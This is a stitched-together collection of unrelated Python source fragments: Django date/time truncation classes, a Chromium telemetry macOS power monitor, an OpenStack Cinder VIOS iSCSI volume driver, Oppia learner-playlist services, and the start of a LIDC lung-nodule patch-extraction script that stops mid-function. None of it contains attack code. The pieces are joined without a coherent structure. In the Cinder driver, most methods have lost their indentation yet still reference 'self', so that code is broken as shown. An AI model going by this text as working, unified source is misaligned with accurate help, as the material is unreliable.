                field.name, output_field.__class__.__name__ if has_explicit_output_field else 'DateTimeField'
            ))
        return copy
    def convert_value(self, value, expression, connection):
        """Post-process database values: re-attach timezone info for aware
        datetimes and narrow datetimes to date/time for those output fields."""
        if isinstance(self.output_field, DateTimeField):
            if not settings.USE_TZ:
                pass
            elif value is not None:
                value = value.replace(tzinfo=None)
                value = timezone.make_aware(value, self.tzinfo)
            elif not connection.features.has_zoneinfo_database:
                raise ValueError(
                    'Database returned an invalid datetime value. Are time '
                    'zone definitions for your database installed?'
                )
        elif isinstance(value, datetime):
            # NOTE(review): value cannot be None inside this isinstance()
            # branch, so the first arm below is dead code.
            if value is None:
                pass
            elif isinstance(self.output_field, DateField):
                value = value.date()
            elif isinstance(self.output_field, TimeField):
                value = value.time()
        return value
class Trunc(TruncBase):
    """Generic truncation where the precision is passed at construction."""
    def __init__(self, expression, kind, output_field=None, tzinfo=None, **extra):
        self.kind = kind
        super().__init__(expression, output_field=output_field, tzinfo=tzinfo, **extra)
class TruncYear(TruncBase):
    """Truncate to the first moment of the year."""
    kind = 'year'
class TruncQuarter(TruncBase):
    """Truncate to the first moment of the quarter."""
    kind = 'quarter'
class TruncMonth(TruncBase):
    """Truncate to the first moment of the month."""
    kind = 'month'
class TruncWeek(TruncBase):
    """Truncate to midnight on the Monday of the week."""
    kind = 'week'
class TruncDay(TruncBase):
    """Truncate to midnight of the day."""
    kind = 'day'
class TruncDate(TruncBase):
    """Cast a datetime expression to a date."""
    kind = 'date'
    lookup_name = 'date'
    output_field = DateField()
    def as_sql(self, compiler, connection):
        # Cast to date rather than truncate to date.
        lhs, lhs_params = compiler.compile(self.lhs)
        tzname = timezone.get_current_timezone_name() if settings.USE_TZ else None
        sql = connection.ops.datetime_cast_date_sql(lhs, tzname)
        return sql, lhs_params
class TruncTime(TruncBase):
    """Cast a datetime expression to a time."""
    kind = 'time'
    lookup_name = 'time'
    output_field = TimeField()
    def as_sql(self, compiler, connection):
        # Cast to time rather than truncate to time (comment previously
        # said "date" — it was copied from TruncDate).
        lhs, lhs_params = compiler.compile(self.lhs)
        tzname = timezone.get_current_timezone_name() if settings.USE_TZ else None
        sql = connection.ops.datetime_cast_time_sql(lhs, tzname)
        return sql, lhs_params
class TruncHour(TruncBase):
    """Truncate to the start of the hour."""
    kind = 'hour'
class TruncMinute(TruncBase):
    """Truncate to the start of the minute."""
    kind = 'minute'
class TruncSecond(TruncBase):
    """Truncate to the start of the second."""
    kind = 'second'
# Register the date/time casts as lookups on DateTimeField.
DateTimeField.register_lookup(TruncDate)
DateTimeField.register_lookup(TruncTime)
| |
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import logging
import os
import plistlib
import shutil
import tempfile
import xml.parsers.expat
from telemetry.core import os_version
from telemetry.core import util
from telemetry import decorators
from telemetry.internal.platform import power_monitor
class PowerMetricsPowerMonitor(power_monitor.PowerMonitor):
  """Mac OS X power monitor backed by the /usr/bin/powermetrics utility.

  NOTE(review): this is Python 2 code (xrange, dict.has_key,
  plistlib.readPlistFromString) — none of these exist under Python 3.
  """
  def __init__(self, backend):
    super(PowerMetricsPowerMonitor, self).__init__()
    self._powermetrics_process = None
    self._backend = backend
    self._output_filename = None
    self._output_directory = None
  @property
  def binary_path(self):
    # Absolute path to the powermetrics binary on OS X.
    return '/usr/bin/powermetrics'
  def StartMonitoringPower(self, browser):
    """Launch powermetrics and block until it has created its output file."""
    assert not self._powermetrics_process, (
        'Must call StopMonitoringPower().')
    # Empirically powermetrics creates an empty output file immediately upon
    # starting. We detect file creation as a signal that measurement has
    # started. In order to avoid various race conditions in tempfile creation
    # we create a temp directory and have powermetrics create its output
    # there rather than say, creating a tempfile, deleting it and reusing its
    # name.
    self._output_directory = tempfile.mkdtemp()
    self._output_filename = os.path.join(self._output_directory,
        'powermetrics.output')
    args = ['-f', 'plist',
            '-u', self._output_filename,
            '-i0',
            '--show-usage-summary']
    self._powermetrics_process = self._backend.LaunchApplication(
        self.binary_path, args, elevate_privilege=True)
    # Block until output file is written to ensure this function call is
    # synchronous in respect to powermetrics starting.
    def _OutputFileExists():
      return os.path.isfile(self._output_filename)
    util.WaitFor(_OutputFileExists, 1)
  @decorators.Cache
  def CanMonitorPower(self):
    # Monitoring requires OS X Mavericks or newer plus permission to launch
    # the powermetrics binary.
    mavericks_or_later = (
        self._backend.GetOSVersionName() >= os_version.MAVERICKS)
    binary_path = self.binary_path
    return mavericks_or_later and self._backend.CanLaunchApplication(
        binary_path)
  @staticmethod
  def _ParsePlistString(plist_string):
    """Wrapper to parse a plist from a string and catch any errors.

    Sometimes powermetrics will exit in the middle of writing its output,
    empirically it seems that it always writes at least one sample in its
    entirety so we can safely ignore any errors in its output.

    Returns:
      Parser output on successful parse, None on parse error.
    """
    try:
      # NOTE(review): readPlistFromString is the legacy (pre-3.4) plistlib
      # API, removed in modern Python — loads() is its replacement.
      return plistlib.readPlistFromString(plist_string)
    except xml.parsers.expat.ExpatError:
      return None
  @staticmethod
  def ParsePowerMetricsOutput(powermetrics_output):
    """Parse output of powermetrics command line utility.

    Returns:
      Dictionary in the format returned by StopMonitoringPower() or None
      if |powermetrics_output| is empty - crbug.com/353250 .
    """
    if len(powermetrics_output) == 0:
      logging.warning('powermetrics produced zero length output')
      return None
    # Container to collect samples for running averages.
    # out_path - list containing the key path in the output dictionary.
    # src_path - list containing the key path to get the data from in
    # powermetrics' output.
    def ConstructMetric(out_path, src_path):
      RunningAverage = collections.namedtuple('RunningAverage', [
          'out_path', 'src_path', 'samples'])
      return RunningAverage(out_path, src_path, [])
    # List of RunningAverage objects specifying metrics we want to aggregate.
    metrics = [
        ConstructMetric(
            ['component_utilization', 'whole_package', 'average_frequency_hz'],
            ['processor', 'freq_hz']),
        ConstructMetric(
            ['component_utilization', 'whole_package', 'idle_percent'],
            ['processor', 'packages', 0, 'c_state_ratio'])]
    def DataWithMetricKeyPath(metric, powermetrics_output):
      """Retrieve the sample from powermetrics' output for a given metric.

      Args:
        metric: The RunningAverage object we want to collect a new sample for.
        powermetrics_output: Dictionary containing powermetrics output.

      Returns:
        The sample corresponding to |metric|'s keypath."""
      # Get actual data corresponding to key path.
      out_data = powermetrics_output
      for k in metric.src_path:
        out_data = out_data[k]
      assert type(out_data) in [int, float], (
          'Was expecting a number: %s (%s)' % (type(out_data), out_data))
      return float(out_data)
    sample_durations = []
    total_energy_consumption_mwh = 0
    # powermetrics outputs multiple plists separated by null terminators.
    # NOTE(review): despite the comment above, the assert below requires
    # exactly one sample plist — confirm which is intended.
    raw_plists = powermetrics_output.split('\0')
    raw_plists = [x for x in raw_plists if len(x) > 0]
    assert len(raw_plists) == 1
    # -------- Examine contents of first plist for systems specs. --------
    plist = PowerMetricsPowerMonitor._ParsePlistString(raw_plists[0])
    if not plist:
      logging.warning('powermetrics produced invalid output, output length: '
                      '%d', len(powermetrics_output))
      return {}
    # Powermetrics doesn't record power usage when running on a VM.
    hw_model = plist.get('hw_model')
    if hw_model and hw_model.startswith('VMware'):
      return {}
    if 'GPU' in plist:
      metrics.extend([
          ConstructMetric(
              ['component_utilization', 'gpu', 'average_frequency_hz'],
              ['GPU', 0, 'freq_hz']),
          ConstructMetric(
              ['component_utilization', 'gpu', 'idle_percent'],
              ['GPU', 0, 'c_state_ratio'])])
    # There's no way of knowing ahead of time how many cpus and packages the
    # current system has. Iterate over cores and cpus - construct metrics for
    # each one.
    if 'processor' in plist:
      core_dict = plist['processor']['packages'][0]['cores']
      num_cores = len(core_dict)
      cpu_num = 0
      for core_idx in xrange(num_cores):
        num_cpus = len(core_dict[core_idx]['cpus'])
        base_src_path = ['processor', 'packages', 0, 'cores', core_idx]
        for cpu_idx in xrange(num_cpus):
          base_out_path = ['component_utilization', 'cpu%d' % cpu_num]
          # C State ratio is per-package, component CPUs of that package may
          # have different frequencies.
          metrics.append(ConstructMetric(
              base_out_path + ['average_frequency_hz'],
              base_src_path + ['cpus', cpu_idx, 'freq_hz']))
          metrics.append(ConstructMetric(
              base_out_path + ['idle_percent'],
              base_src_path + ['c_state_ratio']))
          cpu_num += 1
    # -------- Parse Data Out of Plists --------
    # NOTE(review): raw_plists[0] is parsed a second time here; the result
    # from the parse above could be reused.
    plist = PowerMetricsPowerMonitor._ParsePlistString(raw_plists[0])
    if not plist:
      logging.error('Error parsing plist.')
      return {}
    # Duration of this sample.
    # NOTE(review): Python 2 integer division — truncates to whole ms.
    sample_duration_ms = int(plist['elapsed_ns']) / 10 ** 6
    sample_durations.append(sample_duration_ms)
    if 'processor' not in plist:
      logging.error("'processor' field not found in plist.")
      return {}
    processor = plist['processor']
    total_energy_consumption_mwh = (
        (float(processor.get('package_joules', 0)) / 3600.) * 10 ** 3)
    for m in metrics:
      m.samples.append(DataWithMetricKeyPath(m, plist))
    # -------- Collect and Process Data --------
    out_dict = {}
    out_dict['identifier'] = 'powermetrics'
    out_dict['energy_consumption_mwh'] = total_energy_consumption_mwh
    def StoreMetricAverage(metric, sample_durations, out):
      """Calculate average value of samples in a metric and store in output
      path as specified by metric.

      Args:
        metric: A RunningAverage object containing samples to average.
        sample_durations: A list which parallels the samples list containing
          the time slice for each sample.
        out: The output dict, average is stored in the location specified by
          metric.out_path.
      """
      if len(metric.samples) == 0:
        return
      assert len(metric.samples) == len(sample_durations)
      # Duration-weighted average of the samples.
      avg = 0
      for i in xrange(len(metric.samples)):
        avg += metric.samples[i] * sample_durations[i]
      avg /= sum(sample_durations)
      # Store data in output, creating empty dictionaries as we go.
      for k in metric.out_path[:-1]:
        if not out.has_key(k):
          out[k] = {}
        out = out[k]
      out[metric.out_path[-1]] = avg
    for m in metrics:
      StoreMetricAverage(m, sample_durations, out_dict)
    return out_dict
  def _KillPowerMetricsProcess(self):
    """Kill a running powermetrics process."""
    try:
      self._powermetrics_process.terminate()
    except OSError:
      # terminate() can fail when Powermetrics does not have the SetUID set.
      self._backend.LaunchApplication(
          '/usr/bin/pkill',
          ['-SIGTERM', os.path.basename(self.binary_path)],
          elevate_privilege=True)
  def StopMonitoringPower(self):
    """Stop powermetrics, parse its output file, and clean up temp state."""
    assert self._powermetrics_process, (
        'StartMonitoringPower() not called.')
    # Tell powermetrics to take an immediate sample.
    try:
      self._KillPowerMetricsProcess()
      (power_stdout, power_stderr) = self._powermetrics_process.communicate()
      returncode = self._powermetrics_process.returncode
      # -15 is the expected exit status after SIGTERM.
      assert returncode in [0, -15], (
          """powermetrics error
          return code=%d
          stdout=(%s)
          stderr=(%s)""" % (returncode, power_stdout, power_stderr))
      with open(self._output_filename, 'rb') as output_file:
        powermetrics_output = output_file.read()
      return PowerMetricsPowerMonitor.ParsePowerMetricsOutput(
          powermetrics_output)
    finally:
      # Always clear the temp directory and process handle, even on failure.
      shutil.rmtree(self._output_directory)
      self._output_directory = None
      self._output_filename = None
      self._powermetrics_process = None
| |
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Driver for aix servers running ISCSI.
"""
import socket
from oslo.config import cfg
from cinder import exception
from cinder import db as db_api
from cinder import units
from cinder import utils
from cinder.volume import iscsi
from cinder.volume import utils as volutils
from cinder.volume import volume_types
from cinder.openstack.common import log as logging
from cinder.openstack.common import processutils
from cinder.openstack.common import uuidutils
from cinder.openstack.common.db import exception as db_exc
from paxes_cinder.volume.drivers.vios import vios_iscsi as vios_iscsi
from paxes_cinder.volume.drivers.vios import vios_lvm as driver
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class VIOSLVMISCSIDriver(driver.VIOSLVMDriver, vios_iscsi.VIOSISCSIDriver):
    def __init__(self, *args, **kwargs):
        # The db handle is pulled out before super().__init__ because
        # get_target_helper() needs it.
        self.db = kwargs.get('db')
        self.target_helper = self.get_target_helper(self.db)
        super(VIOSLVMISCSIDriver, self).__init__(*args, **kwargs)
        self.backend_name =\
            self.configuration.safe_get('volume_backend_name') or 'LVM_iSCSI'
        self.protocol = 'viSCSI'
        # NOTE(review): generate_uuid()[8] yields a single character; a short
        # unique prefix ([:8]) was probably intended — confirm before fixing.
        self.target_name = self.configuration.safe_get('host') or uuidutils.generate_uuid()[8]
    def set_execute(self, execute):
        # Propagate the command executor to the base driver and, when
        # present, to the iSCSI target helper so both shell out the same way.
        super(VIOSLVMISCSIDriver, self).set_execute(execute)
        if self.target_helper is not None:
            self.target_helper.set_execute(execute)
# def do_setup(self, ctxt):
# LOG.debug('enter: do_setup')
# self._context = ctxt
# # Ensure that the default volume type exists
# vtn = self.configuration.default_volume_type
# vtn = vtn.decode('utf-8') if vtn else vtn
# try:
# volume_types.get_volume_type_by_name(ctxt, vtn)
# except exception.VolumeTypeNotFoundByName:
# # If the default volume type does not exist, we create it here.
# LOG.info(_("Creating default volume type '%s'") % vtn)
# self._create_default_volume_type(ctxt, vtn)
#
# LOG.debug('leave: do_setup')
#
# def _create_default_volume_type(self, context, volume_type_name):
# """Internal Helper Method to Create a Default Volume Type for Host"""
# ##vbn = self.configuration.volume_backend_name
#
# extra_specs = {}
# extra_specs['drivers:display_name'] = volume_type_name
# ##extra_specs['capabilities:volume_backend_name'] = vbn
#
# def voltype_create(name, extra_specs):
# """ Don't use volume_type.create during init_host"""
# try:
# type_ref = db_api.volume_type_create(
# context, dict(name=name, extra_specs=extra_specs))
# except db_exc.DBError as e:
# LOG.exception(_('DB error: %s') % e)
# raise exception.VolumeTypeCreateFailed(
# name=name, extra_specs=extra_specs)
# return type_ref
#
# return voltype_create(volume_type_name, extra_specs)
def initialize_connection(self, volume, connector):
volume_name = volume['name'][0:15]
target_name = '%s:%s' % (connector['initiator'], volume_name)
#target_name = '%s:%s' % (connector['initiator'], self.target_name)
volume_type = self.protocol.lower()
properties = {}
properties['target_portal'] = '%s:%s' % (CONF.iscsi_ip_address, CONF.iscsi_port)
properties['target_iqn'] = target_name
target, lun_id = self._create_export('', target_name, volume_name)
properties['target_name'] = target
properties['target_lun'] = lun_id
properties['volume_id'] = volume['id']
return {'driver_volume_type': volume_type, 'data': properties, }
def terminate_connection(self, volume, connector, **kwargs):
volume_name = volume["name"][0:15]
iqn = '%s:%s' % (connector['initiator'], volume_name)
self._remove_export(volume_name, iqn)
##def create_export(self, context, volume):
## """Creates an export for a logical volume."""
## return self._create_export(context, volume)
def create_volume(self, volume):
#self._create_export("", "volume-7b7cdd64")
"""Creates a logical volume."""
mirror_count = 0
if self.configuration.lvm_mirrors:
mirror_count = self.configuration.lvm_mirrors
self._create_volume(volume['name'],
self._sizestr(volume['size']),
self.configuration.lvm_type,
mirror_count)
def _create_export(self, context, iscsi_name, volume_name):
"""Creates an export for a logical volume."""\
##iscsi_name = "%s%s" % (CONF.iscsi_target_prefix,
## volume['name'])
target = self.create_vios_iscsi_target(iscsi_name=iscsi_name, volume_name=volume_name)
lun = None
if target:
lun = self.export_vios_iscsi_target(target=target, volume_name=volume_name)
return target, lun
def _remove_export(self, volume_name, iqn):
'''
Delete the lu
'''
lu = self.get_lu_by_volume(volume_name)
##Remove the lu
self.remove_dev(lu)
##Remove the target
target = self.get_target_by_iqn(iqn)
self.remove_dev(target)
## def remove_export(self, context, volume):
## return self.remove_dev(volume)
## def ensure_export(self, context, volume):
## volume_name = volume['name']
## result = self.ensure_vios_export(volume_name)
## if result:
## self.db.volume_update(context, volume['id'], model_update) ##need update
def get_target_helper(self, db):
root_helper = utils.get_root_helper()
##CONF.iscsi_helper == 'tgtadm':
return iscsi.TgtAdm(root_helper,
CONF.volumes_dir,
CONF.iscsi_target_prefix,
db=db)
def create_cloned_volume(self, volume, src_vref):
"""Creates a clone of the specified volume."""
mirror_count = 0
if self.configuration.lvm_mirrors:
mirror_count = self.configuration.lvm_mirrors
LOG.info(_('Creating clone of volume: %s') % src_vref['id'])
volume_name = src_vref['name']
temp_id = 'tmp-snap-%s' % volume['id']
temp_snapshot = {'name': volume_name,
'size': src_vref['size'],
'volume_size': src_vref['size'],
'snap_name': 'clone-snap-%s' % volume['id'],
'id': temp_id}
#self.create_snapshot(temp_snapshot)
self._create_volume(volume['name'],
self._sizestr(volume['size']),
self.configuration.lvm_type,
mirror_count)
#self.vg.activate_lv(temp_snapshot['name'], is_snapshot=True)
# copy_volume expects sizes in MiB, we store integer GiB
# be sure to convert before passing in
try:
self.copy_volume(
self.local_path(temp_snapshot),
self.local_path(volume),
src_vref['size'] * units.KiB,
self.configuration.volume_dd_blocksize,
execute=self._execute)
finally:
#self.delete_snapshot(tmp_snapshot)
pass
| |
# coding: utf-8
#
# Copyright 2017 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Services for the learner playlist feature of the learner dashboard."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
from core.domain import subscription_services
from core.domain import user_domain
from core.platform import models
import feconf
(user_models,) = models.Registry.import_models([models.NAMES.user])
MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT = (
feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT)
def get_learner_playlist_from_model(learner_playlist_model):
    """Builds a LearnerPlaylist domain object out of a datastore model.

    Args:
        learner_playlist_model: LearnerPlaylistModel. The
            learner playlist model from the datastore.

    Returns:
        LearnerPlaylist. The learner playlist domain object corresponding
        to the given model.
    """
    model = learner_playlist_model
    return user_domain.LearnerPlaylist(
        model.id, model.exploration_ids, model.collection_ids)
def save_learner_playlist(learner_playlist):
    """Persists a learner playlist domain object as a LearnerPlaylistModel
    entity, creating the entity when it does not exist yet.

    Args:
        learner_playlist: LearnerPlaylist. The learner playlist domain
            object to be saved in the datastore.
    """
    attributes = {
        'exploration_ids': learner_playlist.exploration_ids,
        'collection_ids': learner_playlist.collection_ids
    }
    model = user_models.LearnerPlaylistModel.get_by_id(learner_playlist.id)
    if model is None:
        attributes['id'] = learner_playlist.id
        user_models.LearnerPlaylistModel(**attributes).put()
    else:
        model.populate(**attributes)
        model.put()
def mark_exploration_to_be_played_later(
        user_id, exploration_id, position_to_be_inserted=None):
    """Adds the exploration id to the learner playlist of the user at the
    given position, or at the end when no position is given.

    Explorations created or edited by the user are never added, since those
    already appear on the creator dashboard. The playlist holds at most
    feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT entries; additions beyond
    that limit are dropped.

    Args:
        user_id: str. The id of the user.
        exploration_id: str. The id of the exploration to be added to the
            learner playlist.
        position_to_be_inserted: int|None. If this is specified the
            exploration gets inserted at the given position. Otherwise it
            gets added at the end.

    Returns:
        (bool, bool). The first boolean indicates whether the playlist limit
        of the user has been exceeded, and the second boolean indicates
        whether the exploration is among one of the created or edited
        explorations of the user.
    """
    learner_playlist_model = user_models.LearnerPlaylistModel.get(
        user_id, strict=False)
    if not learner_playlist_model:
        learner_playlist_model = user_models.LearnerPlaylistModel(id=user_id)

    subscribed_exploration_ids = (
        subscription_services.get_exploration_ids_subscribed_to(user_id))
    learner_playlist = get_learner_playlist_from_model(learner_playlist_model)

    playlist_limit_exceeded = False
    if exploration_id in subscribed_exploration_ids:
        # Owned/edited explorations belong on the creator dashboard instead.
        return playlist_limit_exceeded, True

    already_in_playlist = exploration_id in learner_playlist.exploration_ids
    under_limit = (
        len(learner_playlist.exploration_ids) <
        MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT)
    if already_in_playlist and position_to_be_inserted is not None:
        # Reposition an entry that is already present.
        learner_playlist.remove_exploration_id(exploration_id)
        learner_playlist.insert_exploration_id_at_given_position(
            exploration_id, position_to_be_inserted)
    elif not already_in_playlist and under_limit:
        if position_to_be_inserted is None:
            learner_playlist.add_exploration_id_to_list(exploration_id)
        else:
            learner_playlist.insert_exploration_id_at_given_position(
                exploration_id, position_to_be_inserted)
    elif not already_in_playlist:
        playlist_limit_exceeded = True
    save_learner_playlist(learner_playlist)
    return playlist_limit_exceeded, False
def mark_collection_to_be_played_later(
        user_id, collection_id, position_to_be_inserted=None):
    """Adds the collection id to the learner playlist of the user at the
    given position, or at the end when no position is given.

    Collections created or edited by the user are never added, since those
    already appear on the creator dashboard. The playlist holds at most
    feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT entries; additions beyond
    that limit are dropped.

    Args:
        user_id: str. The id of the user.
        collection_id: str. The id of the collection to be added to the
            learner playlist.
        position_to_be_inserted: int|None. If this is specified the
            collection gets inserted at the given position. Otherwise it
            gets added at the end.

    Returns:
        (bool, bool). The first boolean indicates whether the playlist limit
        of the user has been exceeded, and the second boolean indicates
        whether the collection is among one of the created or edited
        collections of the user.
    """
    learner_playlist_model = user_models.LearnerPlaylistModel.get(
        user_id, strict=False)
    if not learner_playlist_model:
        learner_playlist_model = user_models.LearnerPlaylistModel(id=user_id)

    subscribed_collection_ids = (
        subscription_services.get_collection_ids_subscribed_to(user_id))
    learner_playlist = get_learner_playlist_from_model(learner_playlist_model)

    playlist_limit_exceeded = False
    if collection_id in subscribed_collection_ids:
        # Owned/edited collections belong on the creator dashboard instead.
        return playlist_limit_exceeded, True

    already_in_playlist = collection_id in learner_playlist.collection_ids
    under_limit = (
        len(learner_playlist.collection_ids) <
        MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT)
    if already_in_playlist and position_to_be_inserted is not None:
        # Reposition an entry that is already present.
        learner_playlist.remove_collection_id(collection_id)
        learner_playlist.insert_collection_id_at_given_position(
            collection_id, position_to_be_inserted)
    elif not already_in_playlist and under_limit:
        if position_to_be_inserted is None:
            learner_playlist.add_collection_id_to_list(collection_id)
        else:
            learner_playlist.insert_collection_id_at_given_position(
                collection_id, position_to_be_inserted)
    elif not already_in_playlist:
        playlist_limit_exceeded = True
    save_learner_playlist(learner_playlist)
    return playlist_limit_exceeded, False
def remove_exploration_from_learner_playlist(user_id, exploration_id):
    """Removes the exploration from the learner playlist of the user
    (if present).

    Args:
        user_id: str. The id of the user.
        exploration_id: str. The id of the exploration to be removed.
    """
    playlist_model = user_models.LearnerPlaylistModel.get(
        user_id, strict=False)
    if not playlist_model:
        return
    learner_playlist = get_learner_playlist_from_model(playlist_model)
    if exploration_id not in learner_playlist.exploration_ids:
        return
    learner_playlist.remove_exploration_id(exploration_id)
    save_learner_playlist(learner_playlist)
def remove_collection_from_learner_playlist(user_id, collection_id):
    """Removes the collection from the learner playlist of the user
    (if present).

    Args:
        user_id: str. The id of the user.
        collection_id: str. The id of the collection to be removed.
    """
    playlist_model = user_models.LearnerPlaylistModel.get(
        user_id, strict=False)
    if not playlist_model:
        return
    learner_playlist = get_learner_playlist_from_model(playlist_model)
    if collection_id not in learner_playlist.collection_ids:
        return
    learner_playlist.remove_collection_id(collection_id)
    save_learner_playlist(learner_playlist)
def get_all_exp_ids_in_learner_playlist(user_id):
    """Returns the ids of all the explorations in the playlist of the user.

    Args:
        user_id: str. The id of the user.

    Returns:
        list(str). A list of the ids of the explorations that are in the
        learner playlist of the user.
    """
    playlist_model = user_models.LearnerPlaylistModel.get(
        user_id, strict=False)
    if not playlist_model:
        return []
    return get_learner_playlist_from_model(playlist_model).exploration_ids
def get_all_collection_ids_in_learner_playlist(user_id):
    """Returns the ids of all the collections in the playlist of the user.

    Args:
        user_id: str. The id of the user.

    Returns:
        list(str). A list of the ids of the collections that are in the
        learner playlist of the user.
    """
    playlist_model = user_models.LearnerPlaylistModel.get(
        user_id, strict=False)
    if not playlist_model:
        return []
    return get_learner_playlist_from_model(playlist_model).collection_ids
| |
###################################################################################################
#Sardar Hamidian 07-1-2016
#Reading dicom files and creating 3D-numpy patches both positive and negative (<3mm nodules NOT extracted)
#if you want to add more negative you should change the margin rand in line 179-183
#Input 3D numpy array of dicom files
#Output 3D small samples for feeding CNN model
#
###################################################################################################
import numpy as np
import os
import sys
import scipy.io as sio
from random import randint
#from skimage import io
from skimage import transform as tf
# Things to Do:
#X Change name of folders for output and output_aug so they reflect that they are for pos patches
#X Change folder naming programitcally based on patch_size
#X (Random per pos patch, so not known exactly) Put something reflecting how many negs are extracted per pos up here
#X Add new augmentation modes (contrast, shear, size, combo...); Perhaps should go in different folder s.t. effect of w/wo can
# be compared to see if there is any benefit from these augmentations.
#XShould we do .astype('int16') for cases that are uint16 right here? The patches do get read as int16
# in SupportFuncs, but not sure if that fixes any potential issues (e.g. for augmentation patches) or
# if int16 conversion should be done here. >>>Actually patches from crop_3d were written as float, so
# later in SupportFunc it is unnecessary for them to be read in as int16 and then float, they are already float;
# but full volume was being read as is, and now i added conversion to int16 right when it is read;
#X Something to help avoid re-extraction of patches for cases we already processed?
#X Wrong implementation: pos_nodules_in_each_case is being iteratively updated to include all the nodules;
# but the check of neg patches is done as this is still being loaded with new nodules; e.g. for first nodule,
# intersection is only checked against 1st nodule, then in iteration for 2nd nodule negatives are checked for
# intersection against both 1st and 2nd nodule, and so on; So the info on ALL nodules should be first loaded,
# and only then the intersection should be checked!
#
# --- Patch-extraction configuration ------------------------------------------
# (rows, cols, slices) of every extracted patch, in voxels.
patch_size = (44,44,12) #(36,36,8)
# Compact string form of patch_size; used to build the output folder names.
patch_str = ''.join([str(x) for x in patch_size]) #e.g. get '28288' from (28,28,8)
transFlag = 1 #whether to also augment w transformed nodules; 0 will only augment w flip/rotate nodules; if 1, the transformed nodules written in separate directory
# Output folders: positive patches, negative patches, flip/rotate
# augmentations, and (when transFlag==1) affine-transform augmentations.
pos_output_path = os.path.join('/diskStation/LIDC', patch_str, 'pos_' + patch_str)
neg_output_path = os.path.join('/diskStation/LIDC', patch_str, 'neg_smp_0_' + patch_str)
aug_output_path = os.path.join('/diskStation/LIDC', patch_str, 'pos_aug_0_' + patch_str)
aug_aux_output_path = os.path.join('/diskStation/LIDC', patch_str, 'pos_aug_aux_' + patch_str) #if transFlag==1, transformed nodules written to this
#pos_output_path = os.path.join('/diskStation/LIDC', patch_str, 'pos_' + patch_str + '_test')
#neg_output_path = os.path.join('/diskStation/LIDC', patch_str, 'neg_smp_0_' + patch_str + '_test')
#aug_output_path = os.path.join('/diskStation/LIDC', patch_str, 'pos_aug_0_' + patch_str + '_test')
#aug_aux_output_path = os.path.join('/diskStation/LIDC', patch_str, 'pos_aug_aux_' + patch_str + '_test') #if transFlag==1, transformed nodules written to this
# Input locations: the 3D numpy volumes, and the DICOM tree that holds the
# per-case uniqueStats_*.mat nodule annotation files.
numpy_master_case_path='/diskStation/LIDC/LIDC_NUMPY_3d'
lidcPath='/raida/apezeshk/lung_dicom_dir/'
mat_pre='uniqueStats_'
# NOTE: populated at import time via a directory listing.
lidc_case_list=os.listdir(numpy_master_case_path)
# lidc_sample=['p0049_20000101_s3000627.npy']
#This is the nodule class and keeps all the necessary information about each nodule
class can_nudul(object):
    """Per-nodule bookkeeping: bounding box, average centroid, and the
    inclusion ratio (IURatio == 0 marks a lesion smaller than 3mm).

    The caller passes minY/minX/minZ as x/y/z and maxY/maxX/maxZ as
    x_size/y_size/z_size, so x..x_size etc. are inclusive bbox extremes.
    """
    def __init__(self, case_id, x, y, z, x_size, y_size, z_size,
                 avgCentroidX, avgCentroidY, avgCentroidZ, IURatio,
                 ymarg=0, zmarg=0):
        # ymarg/zmarg are accepted for signature compatibility but unused.
        self.case_id = case_id
        self.x = x
        self.y = y
        self.z = z
        self.x_size = x_size
        self.y_size = y_size
        self.z_size = z_size
        self.avgCentroidX = avgCentroidX
        self.avgCentroidY = avgCentroidY
        self.avgCentroidZ = avgCentroidZ
        self.IURatio = IURatio

    def cal_siz(self):
        """Number of voxels in the (inclusive) bounding box."""
        w, h, d = self.volum_size()
        return w * h * d

    def volum_size(self):
        """Inclusive bounding-box extents as (width, height, depth)."""
        return (self.x_size - self.x + 1,
                self.y_size - self.y + 1,
                self.z_size - self.z + 1)
class can_nudul_pos_neg(object):
    """Same bounding-box bookkeeping as can_nudul but without centroid info;
    used for candidate negative patches and overlap checks."""
    def __init__(self, x, y, z, x_size, y_size, z_size, IURatio=0):
        # x/y/z are the bbox minima, x_size/y_size/z_size the maxima.
        self.x = x
        self.y = y
        self.z = z
        self.x_size = x_size
        self.y_size = y_size
        self.z_size = z_size
        self.IURatio = IURatio

    def cal_siz(self):
        """Number of voxels in the (inclusive) bounding box."""
        w, h, d = self.volum_size()
        return w * h * d

    def volum_size(self):
        """Inclusive bounding-box extents as (width, height, depth)."""
        return (self.x_size - self.x + 1,
                self.y_size - self.y + 1,
                self.z_size - self.z + 1)
def path_creat(file_name):
    """Turn an underscore-delimited case name into a relative path,
    e.g. 'p0049_20000101_s3000627' -> 'p0049/20000101/s3000627'."""
    return file_name.replace('_', '/')
#def pick_from_volum(input_array,can_nudul):
# x=can_nudul.x
# y=can_nudul.y
# z=can_nudul.z
def crop_3d(xcen, ycen, zcen, input_np,
            x_viggle=patch_size[0]/2, yviggla=patch_size[1]/2,
            zviggla=patch_size[2]/2):
    """Crop a patch_size-sized sub-volume of input_np centred on
    (xcen, ycen, zcen); output is float."""
    x_lo, x_hi = int(xcen) - int(x_viggle), int(xcen) + int(x_viggle)
